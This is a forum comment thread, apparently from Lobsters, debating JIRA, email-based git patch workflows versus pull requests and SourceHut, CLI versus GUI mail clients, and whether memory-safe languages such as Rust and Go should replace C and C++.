                                                                Like all right-thinking people, I detest JIRA and every microsecond I spend in it feels like a million agonizing years, but what’s the alternative for bug tracking? Most software of this ilk is not purchased by the people who have to use it, so it responds not to actual user pressure, but to CTO sales pressure. That’s my pet theory about while enterprise software is uniformly terrible, at least.

                                                                1. 6

                                                                  That’s my pet theory about while enterprise software is uniformly terrible, at least.

                                                                  That’s quite close to the theory of the old-timers I’ve asked about it, but there’s an important difference.

                                                                  CTOs ask consultants what software they should use. Consultants who recommend software that’s simple and easily configured go out of business, because most of the money is in helping clients configure/install/start using software.

                                                                  1. 3

                                                                    I like Phabricator much better, and it’s free software too.

                                                                    1. 2

                                                                      GitHub issues are fine.

                                                                    2. 1

                                                                      I do not understand the hate against JIRA. I think it is good software with many useful features. Yes, it can be abused to make tracking your issues really bad, but that is problem of those who use the software and not the software itself.

                                                                    3. 4

                                                                      Good luck actually closing your Atlassian account though :-( I’ve tried to do it many times but still get email from them occasionally when they discover vulnerabilities in products I’ve never used.

                                                                    1. 25

                                                                      With respect to email, don’t forget that pull requests were once intimidating too - as anyone who frequently works with onboarding new developers to its workflow can attest. To help make onboarding users with email easier, I wrote this tutorial:

                                                                      https://git-send-email.io

                                                                      I also wrote a rebase guide which applies to both workflows for making your changes more consistent and easier to review:

                                                                      https://git-rebase.io

                                                                      1. 26

                                                                        https://git-send-email.io

                                                                        That nicely outlines how to send patches, but I think people have far more difficulty receiving patches via email. Not everyone uses mutt, aerc, or runs a patchwork instance. Many mail clients, that people are otherwise generally fairly happy using, are just super not great at handling emailed patches. Emailed patches also generally don’t show a CI status that you can view ahead of time (I have heard of some, but I don’t ever remember seeing it firsthand in the wild).

                                                                        It’s great that it (an email patch workflow) works well with your workflows and tooling, but for some people it just… doesn’t work as well.

                                                                        1. 4

                                                                          I mean, those people who don’t have such a mail client are missing out. It’s like arguing that we should use SVN because not everyone has git installed, in my opinion. And testing your patches against SourceHut CI is pretty easy, before or after it’s sent.

                                                                          1. 26

                                                                            I think one issue is that for most of us, sending and receiving patches is a very small part of what we do with email, so choosing a mail client on that basis doesn’t make sense.

                                                                            1. 1

                                                                              But we aren’t forced to use only one mail client. I use several depending on context / the task at hand.

                                                                              1. 1

                                                                                I am curious about your multiclient workflow. Do you use multiple addresses, or use filters and one shared address? Or just all the mail in all of them?

                                                                                1. 4

                                                                                  Whether you use local maildir or imap, mail stores are designed for concurrent access. How many people check email on their phone and not their phone?

                                                                                  1. 1

                                                                                    Sure, but my question was specifically about their workflow with it.

                                                                                  2. 2

                                                                                    As it happens I do use multiple accounts for multiple “hats”, but that’s slightly orthogonal to multiple clients, which I use even for a single account. My daily driver is mutt; I use thunderbird for rare occasions when I need to see rendered html properly or perform a search (still haven’t got mairix or not much etc set up) and I often use ios mail app but mostly read only.

                                                                                    At work we use Gmail. I do check that from ios mail app too. I recently started configuring mutt to read my work mail too but it’s a work in progress so I still regularly open the Gmail website.

                                                                              2. 23

                                                                                I mean, those people who don’t have such a mail client are missing out. It’s like arguing that we should use SVN because not everyone has git installed, in my opinion.

                                                                                To me it sounds a bit more like arguing “anyone who doesn’t ride a penny-farthing to work every day is totally missing out”.
                                                                                Well…maybe.. I do find it unlikely that is going to convince very many people who weren’t already riding them, or weren’t already inclined to do so. Even if it is amazing.

                                                                                Sidenote1: I may be wrong, but it even appears that Mutt itself uses gitlab instead of email based patches. If true, I find that oddly humorous.

                                                                                Sidenote2: I have nothing against email based patch flows, and if I am going to contribute to a project, I generally contribute in whatever form a project requires (within reason). But for my own projects, I do not desire an emailed patches based workflow (EPBW), nor do I desire to run/manage/admin/moderate(remove spam) a mailing list. That’s just me though.

                                                                                1. 7

                                                                                  To me it sounds a bit more like arguing “anyone who doesn’t ride a penny-farthing to work every day is totally missing out”.

                                                                                  I don’t really like this take. Having sunk thousands of hours into the GitHub, Gerrit, and email-driven workflows, I can confidently assert that the email-driven workflow, even setting aside the many respects in which it is politically and technically superior, is simply the most efficient for both contributors and maintainers. The penny farthing comparison is unfair.

                                                                                  Sidenote1: I may be wrong, but it even appears that Mutt itself uses gitlab instead of email based patches. If true, I find the humorous.

                                                                                  Mutt uses Gitlab and mailing lists and Sourcehut, actually. The dominant avenue of contributions to mutt is through its hosted mailing list. They use Sourcehut CI, however.

                                                                                  Sidenote2: I have nothing against email based patch flows, and if I am going to contribute to a project, I generally contribute in whatever form a project requires (within reason). But for my own projects, I do not desire an emailed patches based workflow (EPBW), nor do I desire to run/manage/admin/moderate(remove spam) a mailing list. That’s just me though.

                                                                                  That’s why Sourcehut can do it for you.

                                                                                  1. 9

                                                                                    I don’t really like this take. Having sunk thousands of hours into the GitHub, Gerrit, and email-driven workflows, I can confidently assert that the email-driven workflow, even setting aside the many respects in which it is politically and technically superior, is simply the most efficient for both contributors and maintainers. The penny farthing comparison is unfair.

                                                                                    A bit of an “Ipse dixit”, but I’ll take it at face value anyway. To be clear, my comment was in response to your statement:

                                                                                    I mean, those people who don’t have such a mail client are missing out.

                                                                                    Which is what I made the comparison against. You have now pulled in other concerns in your response, and attributed them to the comment I made. I find that a bit uncharitable. I guess at this point we can just agree to disagree.

                                                                                    Mutt uses Gitlab and mailing lists and Sourcehut, actually. The dominant avenue of contributions to mutt is through its hosted mailing list. They use Sourcehut CI, however.

                                                                                    That’s odd. I looked through the last 2 months of their mutt-dev mailing list, and saw no mailed patches, but several gitlab PRs. Maybe I saw the wrong mailing list? Maybe I didn’t go back far enough? Overlooked it?
                                                                                    It doesn’t really matter, and I’ll take your word for it that they predominantly use emailed patches.

                                                                                    1. 2

                                                                                      The last 2 months have only seen one patch on Gitlab:

                                                                                      https://gitlab.com/muttmua/mutt/merge_requests?scope=all&utf8=%E2%9C%93&state=merged

                                                                                      After reviewing it myself I have to correct myself, I reckon that Gitlab and the mailing lists are at about an even pace these days.

                                                                                      1. 2

                                                                                        Do note: that was merged PRs. There were a couple of more (not many though!) in All which is what I looked at.

                                                                                2. 5

                                                                                  Not everyone is productive using such mail client. Personally, I just plainly cannot remember more than a few shortcuts, which is already a massive roadblock for effectively using CLI tools as for most of them rely on shortcuts to increase productivity, they also do not provide me with options of what I can do, and I cannot for my life remember what can I do for all the possible contexts, cause of course options on what you can do are dependent on the context which you are currently in. Some people just aren’t productive using CLI tools, and saying that they “are missing out” because they plainly cannot effectively use the tool is simply gatekeeping.

                                                                                  1. 3

                                                                                    saying that they “are missing out” because they plainly cannot effectively use the tool is simply gatekeeping.

                                                                                    This is absurd. If a mechanic decides that he “is not a ratchet person” and will only ever use open-end wrenches, then I will question his professionalism just as I would question a software developer that “is not a CLI person” and will not learn to use a CLI mail client.

                                                                                    He doesn’t need to use the CLI mail client for his day-to-day email, but he should be capable of learning how to use it to handle the occasional emailed patches.

                                                                                    1. 5

                                                                                      Or this person will work with whatever, when paid for (professionals are paid for their work by definition!), but will only work with tools he/she finds enjoyable when doing charity. Thus FLOSS projects forcing inconvenient, last century methods with arrogant communication are missing contribution.

                                                                                      I thing the FLOSS community should focus on this kind of openness more, instead of CoCs.

                                                                                      1. 3

                                                                                        Good point. For work I’ll use whatever tools get the job done, no matter how gruesome. But for FOSS contributions, I agree that if the tool is difficult or simply frustrating to use, then it may as well not exist.

                                                                                      2. 1

                                                                                        Wrong assumption. Difference between using GUI and CLI clients is not like between open-end and ratcheted wrenches. Using those wrenches is basically the same. Meanwhile the experience between using CLI and GUI mail client is a lot bigger. I’d compare it to using automatic and manual wood planes. You can work with higher precision and similar speed with manual hand plane, but most carpenters would choose automatic hand plane, as it “just works” and doesn’t require that much skill and learning to do.

                                                                                        And why should you care what kind of wrench does your car mechanic uses, if he does the job well? This isn’t a problem not using better tools, but a problem of tool abilities. The tools that an average developer uses does not represent the tools that are created for that workflow. And that is a problem.

                                                                                        1. 2

                                                                                          I’ll entertain the analogy to a wood plane, though I’m unfamiliar with the devices. You say it yourself: the manual wood plane is useful in certain circumstances but requires skill. So does the CLI mail client. Use the automatic wood plane where it fits, but at least learn the skill to use the manual wood plane where the higher precision is necessary.

                                                                                          A developer that refuses to acquire a skill is simply not professional.

                                                                                          1. 1

                                                                                            It’s not like it requires much skill. It is the basically the same skill. The difference is, you need to move the manual wood plane along the plank 10 times, while with automatic you only need to move it once and the motor does its job. Some people just don’t have the patience and/or physical stamina to use manual wood plane. Manual hand plane is in fact more configurable, and can be used in more specialized scenarios. So enthusiasts use hand planes. Your average carpenter does not.

                                                                                            1. 2

                                                                                              The analogy was not mine.

                                                                                      3. 0

                                                                                        Consider acme?

                                                                                        1. 2

                                                                                          I am unable to find such email client. And the point is, for a workflow to be usable by a wide range of people, it should require as little new tools that do the same as the ones they use. And in case of email clients, most people probably like their current email client, and they do not want to change it. So they, in turn, do not want to switch to this new workflow, which, while potentially increases productivity, requires them to switch to tools they do not like.

                                                                                          1. 4

                                                                                            acme is a text editor which can be easily coaxed into being a mail client.

                                                                                            Consider as well that you needn’t discard your daily mail client in order to adopt another. What difference does it make if some technology is backed by email or by some other protocol? Just because you already have an HTTP client (e.g. your web browser) doesn’t mean another isn’t useful (e.g. curl).

                                                                                            1. 7

                                                                                              Acme does not seem like general user friendly. My colleagues all use JetBrains IDE’s and use Thunderbird as their mail client. And acme would be a downgrade for their experience. I might use it, but they wouldn’t. If I cannot offer them a good GUI email interface, there is no way they would switch to email-based workflow.

                                                                                              1. 0

                                                                                                I was recommending acme particularly for you, given the following:

                                                                                                I just plainly cannot remember more than a few shortcuts

                                                                                                If your colleagues won’t join you I consider your colleagues to be in the wrong, not the software. A bicycle is easier to use than a car but it’s not going to get you to the other end of town in time for the movie.

                                                                                                1. 14

                                                                                                  If your colleagues won’t join you I consider your colleagues to be in the wrong, not the software.

                                                                                                  Don’t you think peace within a team is more important than any particular software or workflow? Or, to put it another way, the feelings of people are more important than any workflow, so if a large group of people reject a workflow, it’s better to conclude that the workflow is wrong for those people than to say that those people are wrong.

                                                                                                  1. 7

                                                                                                    My colleagues wouldn’t join me because the workflow is bad, but because there is no tooling suitable for them and the workflow. If tooling for a specific workflow just isn’t comfortable for me, I’m just not going to use it.

                                                                                                    1. -8

                                                                                                      Then you ought to be coding in basic. Good things often require effort.

                                                                                                      Edit: this comment seems to be being misinterpreted, so a clarification: I’m not earnestly suggesting that he should use basic. I’m extending his logic to an incorrect conclusion to demonstrate the flaw in his argument. Most languages are harder than Basic, therefore Basic is more comfortable, therefore why ever learn anything else? Obviously it doesn’t make sense.

                                                                                                      1. 18

                                                                                                        You are literally making the exact same argument that @ignaloidas’ colleagues are. The only difference is that the tooling you find suitable and the tooling they find suitable is a null set. They want to be in JetBrains’ IDEs, you want to be in email. You built tooling that demands email-based workflow because it’s what you want and then tell them they have to change; they’ve got tooling that demands GitHub (or a workalike) and then tell their colleagues that they have to change.

                                                                                                        As an aside, I pay for and generally enjoy using Sourcehut, and I respect your diehard allegiance to email, but you’ve got to quit acting like this in the threads. I get that you love an email-based workflow, and find it superior for your use cases. Having used Git and Mercurial since, what, early 2006 I guess—certainly before GitHub and Bitbucket existed—I disagree (especially when your workflow starts to involve binary assets, so most websites, games, mobile apps, and so on), but I’m also comfy in that workflow, and happy to support an SCM that fully supports that flow. But if you insist that people who do not use your workflow are wrong, and do so in this offensive manner, you’re going to start losing customers.

                                                                                                        And as an aside to that aside, you need to do what you want with Sourcehut, but the fighting against this on principles to me, as a former SCM lead, looks a bit forced: looking at this whole thread, and thinking back to a very early comment, all you’d have to do to satisfy him is to make temporary branch names that can be pulled in some mechanism based on the patch series. That’s it. It’s not trivial, but it’s also not that difficult, since you’re already doing 90% of that with the patch view. If you don’t want to do it, that’s fine, but it seems like that’d still mandate patch-accessible workflows, while also meeting the PR crowd a bit.

                                                                                                        1. 2

                                                                                                          Note about the JetBrains’ IDEs. It’s not like they are incompatible with with email driven workflow, they just have tools that are better suited for pull-request workflow. I gave JetBrains IDEs as an example of what an “average” developer as I know it uses from day to day, as it seems that many bloggers have a distorted view of “average” developer. Average developer actually doesn’t want to fiddle with settings and try 10 different variants before deciding to use one. They want tools that “just work” without massive setup. Average carpenter wants a table saw that simply does the job they want to, they do not fiddle around it to make it the best saw for them.

                                                                                                        2. 14

                                                                                                          Hi this is not a very nice tone, please try to argue in good faith.

                                                                                                          1. 13

                                                                                                            Is insulting prospective customers really the best way to grow your business?

                                                                                                            1. 0

                                                                                                              That was no insult, it was a logical extension of his logic. I didn’t mean it sincerely, I was using it to explain his error.

                                                                                                            2. 2

                                                                                                              Ok, in simpler terms. I would probably still use an SUV instead of Smart even if Smart can go through some shorter paths, because I feel cramped when driving it. Same with software. Some software is in fact more useful than other, but is harder/inconvenient to use for some than software which doesn’t have those fancy features.

                                                                                                              1. -5

                                                                                                                This isn’t such a case. This is a case where you (or your colleagues, I’m not sure at this point) are refusing to try unfamiliar things and, being ignorant of the experience, asserting it’s worse.

                                                                                                                1. 3

                                                                                                                  It is. The thing is, I have tried mutt and aerc, and the problem is that I just plainly am not comfortable using bigger CLI programs, that is, those, whose scope goes out of pipes and command line rguments. About the only programs that of such style that I can use is nano and htop, only because they have a handy shortcut guide in the bottom at all times. Acme is also not the kind of editor I would like to use casually. It is easy to blame the people that don’t use it, without understanding the reasons why they don’t use it.

                                                                                                                  1. 0

                                                                                                                    You didn’t know anything of acme not even 2 hours ago. You’ve evaluated it in that time?

                                                                                                                    Herein lies my point. I have a vision and I must at some point exercise my creative authority over the project to secure that vision. Yes, it’s different from what you’re used to. You can construct reasons to excuse this away, but I fundamentally believe that being unwilling to learn something new is the underlying problem. As evidence, I submit that there’s no way you could have given acme a fair evaluation since my suggestion of it. I don’t consider this sort of behavior acceptable cause for changing my system’s design to accomodate.

                                                                                                                    1. 12

                                                                                                                      As someone who used Acme for two years, @ignaloidas does not sound like someone for whom Acme would even be worth trying. It’s great, but incredibly dependent on how you want to use your editor. You can’t disable word wrap, or use any shortcut to move the cursor down a column, for Christ’s sake. It’s really not for everybody (perhaps not even most people).

                                                                                                    2. 2

                                                                                                      So they, in turn, do not want to switch to this new workflow, which, while potentially increases productivity, requires them to switch to tools they do not like.

                                                                                                      What happened to using the right tool for the job?

                                                                                                      1. 1

                                                                                                        The question here is not about “the right tool for the job” but about the usability of those tools for the wider audience. Currently I do not see the majority of the developers switching to email-based workflow purely because of the usability of tools. “Rockstar developers” think that CLI’s are very usable and productive, but that is not the case for the average programmer.

                                                                                                        1. 3

                                                                                                          “Rockstar developers” think that CLI’s are very usable and productive, but that is not the case for the average programmer.

                                                                                                          Good to know that we were all rockstars for decades without realizing it!

                                                                                                          This is probably just an age thing but I don’t know any professional programmers who aren’t comfortable with CLIs.

                                                                                                          1. 3

                                                                                                            There is CLI, and there is CLI application. Git is used through CLI. Vim is a CLI application. Surely you know at least one professional programmer that isn’t comfortable with Vim and alike.

                                                                                                2. 3

                                                                                                  I am not particularly experienced at using git with email. One problem I have had in the past is when I want to pull in a patchset from a mailinglist archive, where either I am not subscribed to the mailinglist, or wasn’t subscribed at the time when the patches were sent. Can these mail clients help me with this problem? (By contrast, I find it very easy to add a branch / PR as a remote and pull or cherry-pick commits that way)

                                                                                                  1. 3

                                                                                                    lists.sr.ht, the sourcehut web archive for mailing lists, has a little copy+paste command line thing you can use to import any patch (or patchset) into your local git repo. Here’s an example:

                                                                                                    https://lists.sr.ht/~sircmpwn/aerc/patches/7471

                                                                                                    On the right, expand the “how do I use this” box and a short command is given there.

                                                                                                    Integration directly with your mail client would require more development but isn’t necessarily out of the question.

                                                                                                    1. 3

                                                                                                      That’s good to see, but presumably doesn’t help for non-sourcehut mailinglists?

                                                                                                      1. 3

                                                                                                        No, I’m afraid that there are fewer good solutions for non-sourcehut mailing lists. Patchworks has a similar feature, if the list in question has that set up. You could also ask someone else for a copy of the mail. I don’t think this damns the idea, it just shows that we need better software to support the idea - which is what sourcehut tries to be.

                                                                                              2. 2

                                                                                                I am still trying to find some time to check out Sourcehut. My only concern is how to configure it to run CI builds on mailing list patches as I couldn’t find it anywhere in the docs.

                                                                                                1. 1

                                                                                                  This hasn’t been implemented yet, but it will be soon.

                                                                                                  1. 1

                                                                                                    Great. If that happens I will think about migrating some of my personal projects to the Sourcehut as it seems pretty as a pretty nice solution.

                                                                                              1. 1

                                                                                                There seems to be a belief amongst memory safety advocates that it is not one out of many ways in which software can fail, but the most critical ones in existance today, and that, if programmers can’t be convinced to switch languages, maybe management can be made to force them.

                                                                                                I didn’t see this kind of zeal when (for example) PHP software fell pray to SQL injections left and right, but I’m trying to understand it. The quoted statistics about found vulnerabilities seem unconvincing, and are just as likely to indicate that static analysis tools have made these kind of programming errors easy to find in existing codebases.

                                                                                                1. 19

                                                                                                  Not all vulnerabilities are equal. I prioritize those that give attackers full control over my computer. They’re the worst. They can lead to every other problem. Plus, their rootkits or damage might not let you have it back. You can lose the physical property, too. Alex’s field evidence shows memory unsafety causes around 70-80% of this. So, worrying about hackers hitting native code, it’s rational to spend 70-80% of one’s effort eliminating memory unsafety.

                                                                                                  More damning is that languages such as Go and D make it easy to write high-performance, maintainable code that’s also memory safe. Go is easier to learn with a huge ecosystem behind it, too. Ancient Java being 10-15x slower than C++ made for a good reason not to use it. Now, most apps are bloated/slow, the market uses them anyway, some safe languages are really lean/fast, using them brings those advantages, and so there’s little reason left for memory-unsafe languages. Even in intended use cases, one can often use a mix of memory-safe and -unsafe languages with unsafe used on performance-sensitive or lowest-level parts of the system. Moreover, safer languages such as Ada and Rust give you guarantees by default on much of that code allowing you to selectively turn them off only where necessary.

                                                                                                  If using unsafe languages and having money, there’s also tools that automatically eliminate most of the memory unsafety bugs. That companies pulling in 8-9 digits still have piles of them show total negligence. Same with those in open-source development who aren’t doing much better. So, on that side of things, whatever tool you encourage should lead to memory safety even with apathetic, incompetent, or rushed developers working on code with complex interactions. Double true if it’s multi-threaded and/or distributed. Safe, orderly-by-default setup will prevent loads of inevitable problems.

                                                                                                  1. 13

                                                                                                    The quoted statistics about found vulnerabilities seem unconvincing

                                                                                                    If studies by security teams at Microsoft and Google, and analysis of Apple’s software is not enough for you, then I don’t know what else could convince you.

                                                                                                    These companies have huge incentives to prevent exploitable vulnerabilities in their software. They get the best developers they can, they are pouring many millions of dollars into preventing these kinds of bugs, and still regularly ship software with vulnerabilities caused by memory unsafety.

                                                                                                    “Why bother with one class of bugs, if another class of bugs exists too” position is not conductive to writing secure software.

                                                                                                    1. 3

                                                                                                      “Why bother with one class of bugs, if another class of bugs exists too” position is not conductive to writing secure software.

                                                                                                      No - but neither is pretending that you can eliminate a whole class of bugs for free. Memory safe languages are free of bugs caused by memory unsafety - but at what cost?

                                                                                                      What other classes of bugs do they make more likely? What is the development cost? Or the runtime performance cost?

                                                                                                      I don’t claim to have the answers but a study that did is the sort of thing that would convince me. Do you know of any published research like this?

                                                                                                      1. 9

                                                                                                        No - but neither is pretending that you can eliminate a whole class of bugs for free. Memory safe languages are free of bugs caused by memory unsafety - but at what cost?

                                                                                                        What other classes of bugs do they make more likely? What is the development cost? Or the runtime performance cost?

                                                                                                        The principle cost of memory safety in Rust, IMO, is that the set of valid programs is more heavily constrained. You often here this manifest as “fighting with the borrow checker.” This is definitely an impediment. I think a large portion of folks get past this stage, in the sense that “fighting the borrow checker” is, for the most part, a temporary hurdle. But there are undoubtedly certain classes of programs that Rust will make harder to write, even for Rust experts.

                                                                                                        Like all trade offs, the hope is that the juice is worth the squeeze. That’s why there has been a lot of effort in making Rust easier to use, and a lot of effort put into returning good error messages.

                                                                                                        I don’t claim to have the answers but a study that did is the sort of thing that would convince me. Do you know of any published research like this?

                                                                                                        I’ve seen people ask this before, and my response is always, “what hypothetical study would actually convince you?” If you think about it, it is startlingly difficult to do such a study. There are many variables to control for, and I don’t see how to control for all of them.

                                                                                                        IMO, the most effective way to show this is probably to reason about vulnerabilities due to memory safety in aggregate. But to do that, you need a large corpus of software written in Rust that is also widely used. But even this methodology is not without its flaws.

                                                                                                        1. 2

                                                                                                          If you think about it, it is startlingly difficult to do such a study. There are many variables to control for, and I don’t see how to control for all of them.

                                                                                                          That’s true - but my comment was in response to one claiming that the bug surveys published by Microsoft et al should be convincing.

                                                                                                          I could imagine something similar being done with large Rust code bases in a few years, perhaps.

                                                                                                          I don’t have enough Rust experience to have a good intuition on this so the following is just an example. I have lots of C++ experience with large code bases that have been maintained over many years by large teams. I believe that C++ makes it harder to write correct software: not (just) because of memory safety issues, undefined behavior etc. but also because the language is so large, complex and surprising. It is possible to write good C++ but it is hard to maintain it over time. For that reason, I have usually promoted C rather than C++ where there has been a choice.

                                                                                                          That was a bit long-winded but the point I was trying to make is that languages can encourage or discourage different classes of bugs. C and C++ have the same memory safety and undefined behavior issues but one is more likely than the other to engender other bugs.

                                                                                                          It is possible that Rust is like C++, i.e. that its complexity encourages other bugs even as its borrow checker prevents memory safety bugs. (I am not now saying that is true, just raising the possibility.)

                                                                                                          This sort of consideration does not seem to come up very often when people claim that Rust is obviously better than C for operating systems, for example. I would love to read an article that takes this sort of thing into account - written by someone with more relevant experience than me!

                                                                                                          1. 7

                                                                                                            I’ve been writing Rust for over 4 years (after more than a decade of C), and in my experience:

                                                                                                            • For me Rust has completely eliminated memory unsafety bugs. I don’t even use debuggers or Valgrind any more, unless I’m integrating Rust with C.
                                                                                                            • I used to have, at least during development, all kinds of bugs that spray the heap, corrupt some data somewhere, use uninitialized memory, use-after-free. Now I get compile-time errors or panics (which are safe, technically like C++ exceptions).
                                                                                                            • I get fewer bugs overall. Lack of NULL and mandatory error handling are amazing for reliability.
                                                                                                            • Built-in unit test framework, richer standard library and easy access to 3rd party dependencies help too (e.g. instead of hand-rolling another own buggy hash table, I use a well-tested well-optimized one).
                                                                                                            • My Rust programs are much faster. Single-threaded Rust is 95% as fast as single-threaded C, but I can easily parallelize way more than I’d ever dare in C.

                                                                                                            The costs:

                                                                                                            • Rust’s compile times are not nice.
                                                                                                            • It took me a while to become productive in Rust. “Getting” ownership requires unlearning C and a lot of practice. However, I’m not fighting the borrow checker any more, and I’m more productive in Rust thanks to higher-level abstractions (e.g. I can write map/reduce iterator that collects something into a btree — in 1 line).
                                                                                                      2. 0

                                                                                                        Of course older software, mostly written in memory-unsafe languages, sometimes written in a time when not every device was connected to a network, contains more known memory vulnerabilities. Especially when it’s maintained and audited by companies with excellent security teams.

                                                                                                        These statistics don’t say much at all about the overall state of our software landscape. It doesn’t say anything about the relative quality of memory-unsafe codebases versus memory-safe codebases. It also doesn’t say anything about the relative sizes of memory-safe and memory-unsafe codebases on the internet.

                                                                                                        1. 10

                                                                                                          iOS and Android aren’t “older software”. They’ve been born to be networked, and supposedly secure, from the start.

                                                                                                          Memory-safe codebases have 0% memory-unsafety vulnerabilities, so that is easily comparable. For example, check out the CVE database. Even within one project — Android — you can easily see whether the C or the Java layers are responsible for the vulnerabilities (spoiler: it’s C, by far). There’s a ton of data on all of this.

                                                                                                          1. 2

                                                                                                            Android is largely cobbled together from older software, as is IOS. I think Android still needs a Fortran compiler to build some dependencies.

                                                                                                            1. 9

                                                                                                              That starts to look like a No True Scotsman. When real-world C codebases have vulnerabilities, they’re somehow not proper C codebases. Even when they’re part of flagship products of top software companies.

                                                                                                              1. 2

                                                                                                                I’m actually not arguing that good programmers are able to write memory-safe code in unsafe languages. I’m arguing vulnerabilities happen at all levels in programming, and that, while memory safety bugs are terrible, there are common classes of bugs in more widely used (and more importantly, more widely deployed languages), that make it just one class of bugs out of many.

                                                                                                                When XSS attacks became common, we didn’t implore VPs to abandon Javascript.

                                                                                                                We’d have reached some sort of conclusion earlier if you’d argued with the point I was making rather than with the point you wanted me to make.

                                                                                                                1. 4

                                                                                                                  When XSS attacks became common, we didn’t implore VPs to abandon Javascript.

                                                                                                                  Actually did. Sites/companies that solved XSS did so by banning generation of markup “by hand”, and instead mandated use of safe-by-default template engines (e.g. JSX). Same with SQL injection: years of saying “be careful, remember to escape” didn’t work, and “always use prepared statements” worked.

                                                                                                                  These classes of bugs are prevalent only where developers think they’re not a problem (e.g. they’ve been always writing pure PHP, and will continue to write pure PHP forever, because there’s nothing wrong with it, apart from the XSS and SQLi, which are a force of nature and can’t be avoided).

                                                                                                                  1. 1

                                                                                                                    This kind of makes me think of someone hearing others talk about trying to lower the murder rate and then hysterically going into a rant about how murder is only one class of crime

                                                                                                                    1. -1

                                                                                                                      I think a better analogy is campaigning aggressively to ban automatic rifles when the vast majority of murders are committed using handguns.

                                                                                                                      Yes, automatic rifles are terrible. But pointing them out as the main culprit behind the high murder rate is also incorrect.

                                                                                                                      1. 4

                                                                                                                        That analogy is really terrible and absolutely not fitting the context here. It’s also very skewed, the murder rate is not the reason for calls for bans.

                                                                                                                  2. 2

                                                                                                                    Although I mostly agree, I’ll note Android was originally built by a small business acquired by Google that continued to work on it probably with extra resources from Google. That makes me picture a move fast and break things kind of operation that was probably throwing pre-existing stuff together with their own as quickly as possible to get the job done (aka working phones, market share).

                                                                                                                2. 0

                                                                                                                  Yes, if you zoom in on code bases written in memory-unsafe languages, you unsurprisingly get a large number of memory-unsafety vulnerabilities.

                                                                                                                  1. 12

                                                                                                                    And that’s exactly what illustrates “eliminates a class of bugs”. We’re not saying that we’ll end up in utopia. We just don’t need that class of bugs anymore.

                                                                                                                    1. 1

                                                                                                                      Correct, but the author is arguing that this is an exceptionally grievous class of security bugs, and (in another article) that developers’ judgement should not be trusted on this matter.

                                                                                                                      Today, the vast majority of new code is written for a platform where execution of untrusted memory-safe code is a core feature, and the safety of that platform relies on a stack of sandboxes written mostly in C++ (browser) and Objective C/C++/C (system libraries and kernel)

                                                                                                                      Replacing that stack completely is going to be a multi-decade effort, and the biggest players in the industry are just starting to dip their toes in memory-safe languages.

                                                                                                                      What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                      1. 11

                                                                                                                        Replacing that stack completely is going to be a multi-decade effort, and the biggest players in the industry are just starting to dip their toes in memory-safe languages.

                                                                                                                        Hm, so. Apple has developed Swift, which is generally considered a systems programming language, to replace Objective-C, which was their main programming language and already had safety features like baked in ARC. Google has implemented Go. Mozilla Rust. Google uses tons of Rust in Fuchsia and has recently imported the Rust compiler into the Android source tree.

                                                                                                                        Microsoft has recently been blogging about Rust quite a lot and is often seen hanging around and blogs about how severe memory problems are to their safety story. Before that, Microsoft has spent tons of engineering effort into Haskell as a research base and C#/.Net as a replacement for their C/C++ APIs.

                                                                                                                        Amazon has implemented firecracker in Rust and bragged about it on their AWS keynote.

                                                                                                                        Come again about “dipping toes”? Yes, there’s huge amounts of stack around, but there’s also huge amounts to be written!

                                                                                                                        What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                        Because it’s always been a crisis and now we have the tech to fix it.

                                                                                                                        P.S.: In case this felt a bit like bragging Rust over the others: it’s just where I’m most aware of things happening. Go and Swift are doing fine, I just don’t follow as much.

                                                                                                                        1. 2

                                                                                                                          The same argument was made for Java, which on top of its memory safety, was presented as a pry bar against the nearly complete market dominance of the Wintel platform at the time. Java evangelism managed to convert new programmers - and universities - to Java, but not the entire world.

                                                                                                                          Oracle’s deadly embrace of Java didn’t move it to rewrite its main cash cow in Java.

                                                                                                                          Rust evangelists should ask themselves why.

                                                                                                                          I think that of all the memory-safe languages, Microsoft’s C++/CLI effort comes closest to understanding what needs to be done to entice coders to move their software into a memory-safe environment.

                                                                                                                          At my day job, I actually try to spend my discretionary time trying to move our existing codebase to a memory-safe language. It’s mostly about moving the pieces into place so that green-field software can seamlessly communicate with our existing infrastructure. Then seeing what parts of our networking code can be replaced, slowly reinforcing the outer layers while the inner core remains memory unsafe.

                                                                                                                          Delicate stuff, not something you want the VP of Engineering to issue edicts about. In the meantime, I’m still a C++ programmer, and I really don’t appreciate this kind of article painting a big target on my back.

                                                                                                                          1. 4

                                                                                                                            Java and Rust are vastly different ball parks for what you describe. And yet, Java is used successfully in the database world, so it is definitely to be considered. The whole search engine database world is full of Java stacks.

                                                                                                                            Oracle didn’t rewrite its cashcow, because - yes, they are risk-averse and that’s reasonable. That’s no statement on the tech they write it in. But they did write tons of Java stacks around Oracle DB.

                                                                                                                            It’s an argument on the level of “Why isn’t everything at Google Go now?” or “Why isn’t Apple using Swift for everything?”.

                                                                                                                            1. 2

                                                                                                                              Looking at https://news.ycombinator.com/item?id=18442941 it seems that it was too late for a rewrite when Java matured.

                                                                                                                          2. 8

                                                                                                                            What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                            To start the multi-decade effort now, and not spend more decades just saying that buffer overflows are fine, or that—despite of 40 years of evidence to the contrary—programmers can just avoid causing them.

                                                                                                                3. 9

                                                                                                                  I didn’t see this kind of zeal when (for example) PHP software fell pray to SQL injections left and right

                                                                                                                  You didn’t? SQL injections are still #1 in the OWASP top 10. PHP had to retrain an entire generation of engineers to use mysql_real_escape_string over vulnerable alternatives. I could go on…

                                                                                                                  I think we have internalized arguments the SQL injection but have still not accepted memory safety arguments.

                                                                                                                  1. 3

                                                                                                                    I remember arguments being presented to other programmers. This article (and another one I remembered, which, as it turns out, is written by the same author: https://www.vice.com/en_us/article/a3mgxb/the-internet-has-a-huge-cc-problem-and-developers-dont-want-to-deal-with-it ) explicitly target the layperson.

                                                                                                                    The articles use the language of whistleblowers. It suggests that counter-arguments are made in bad faith, that developers are trying to hide this ‘dirty secret’. Consider that C/C++ programmers skew older, have less rosy employment prospects, and that this article feeds nicely into the ageist prejudices already present in our industry.

                                                                                                                    Arguments aimed at programmers, like this one at least acknowledge the counter-arguments, and frame the discussion as one of industry maturity, which I think is correct.

                                                                                                                    1. 2

                                                                                                                      I do not see it as bad faith. There are a non-zero number of people who say they can write memory safe C++ despite there being a massive amount of evidence that even the best programmers get tripped up by UB and threads.

                                                                                                                      1. 1

                                                                                                                        Consider that C/C++ programmers skew older, have less rosy employment prospects, and that this article feeds nicely into the ageist prejudices already present in our industry.

